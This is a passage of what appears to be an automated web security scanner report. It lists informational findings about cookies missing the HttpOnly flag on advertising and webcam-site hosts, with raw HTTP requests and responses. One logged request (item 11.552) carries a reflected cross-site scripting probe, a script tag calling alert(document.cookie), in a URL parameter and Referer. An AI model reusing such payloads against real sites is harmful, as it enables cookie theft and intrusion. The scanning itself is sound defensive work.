Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mdrcej45rm2ieq3do4wugo55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mdrcej45rm2ieq3do4wugo55; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a4b35fa-5d1a-45be-94c9-e53f5978530e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
Set-Cookie: iru=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pru=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:21 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:20 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.548. http://se.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=bb5a5452-c2c5-404a-ad75-499130dd5dbd&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:21 GMT; path=/
ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.549. http://se.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=1f54cc03-0a1d-4a36-ac03-3de445e93bb6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
pse=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:23 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rogpqy45fcdiw1ebtdmjcp55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rogpqy45fcdiw1ebtdmjcp55; path=/; HttpOnly
Set-Cookie: spvdr=vd=1f54cc03-0a1d-4a36-ac03-3de445e93bb6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:23 GMT; path=/
Set-Cookie: ise=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: pse=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:23 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:22 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.550. http://smm.sitescout.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smm.sitescout.com
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sadscpax=5369bdc-; Domain=smm.sitescout.com; Expires=Sat, 29-Jan-2011 17:29:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click?clid=5369bdc&rand=1296224077262&sid=&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D853584%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000101%2C1220000101%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D69%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3Bp%3D6%3Bf%3D990638%3Bh%3D922865%3Bk%3Dhttp%3A%2F%2Fhpi.rotator.hadj7.adjuggler.net%2Fservlet%2Fajrotator%2F63722%2F0%2Fcj%2FV127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016%2F HTTP/1.1
Host: smm.sitescout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Set-Cookie: sadscpax=5369bdc-; Domain=smm.sitescout.com; Expires=Sat, 29-Jan-2011 17:29:42 GMT; Path=/
Location: http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/http%3A%2F%2Fconsumertipsonline.net%2Fhealth%2Fus4.php%3Ft%3D59
Content-Length: 0
Date: Fri, 28 Jan 2011 17:05:41 GMT
Connection: close

11.551. http://syndication.mmismm.com/mmtnt.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/mmtnt.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.552. http://tag.contextweb.com/TAGPUBLISH/getad.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TAGPUBLISH/getad.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

11.553. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
dq=13|3|10|0; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.554. http://tap.rubiconproject.com/oz/sensor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.555. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.rubiconproject.com
Path:	/partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 16:41:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.556. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.557. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.558. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64 HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Date: Sat, 29 Jan 2011 01:41:07 GMT
Content-Length: 0
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

11.560. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ts=1/29/2011+12:42:58+AM; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
NSC_betivggmf-opef=ffffffff0908150145525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 00:47:58 GMT;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.561. http://tr.imlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=1b813c63-80cf-4620-830f-91884d66145b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.562. http://tr.imlive.com/waccess/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

spvdr=vd=9cf4ee93-149b-445d-b620-18522f529033&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
ptr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:32 GMT; path=/
BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ahbkj055dgf1da55e50xhpyx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ahbkj055dgf1da55e50xhpyx; path=/; HttpOnly
Set-Cookie: spvdr=vd=9cf4ee93-149b-445d-b620-18522f529033&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:32 GMT; path=/
Set-Cookie: itr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FLyeSntAZ3vB6KD4a%2fW%2fgHdHElfmZ7crYG0L5Y8D1mNlK; path=/
Set-Cookie: ptr=9ol5WGX0lgMWecNpzhu4OZjty7F6%2f%2bdV7Idg87SJd3%2f86da%2bxN99HM5V8idwfwO59eSkET3h4xcv4smErjijaw%3d%3d; expires=Mon, 14-Mar-2011 13:25:32 GMT; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:31 GMT
Connection: close
Content-Length: 0
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

11.563. http://voken.eyereturn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.564. http://voken.eyereturn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.565. http://voken.eyereturn.com/pb/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/pb/get

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

11.566. http://voken.eyereturn.com/pix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/pix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.567. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a0f0083=a0f021f:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blackvoices.com
Path:	/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dcisid=3244834828.1127760205.2705065472; path=/
bandType=broadband;DOMAIN=.aol.com;PATH=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.569. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

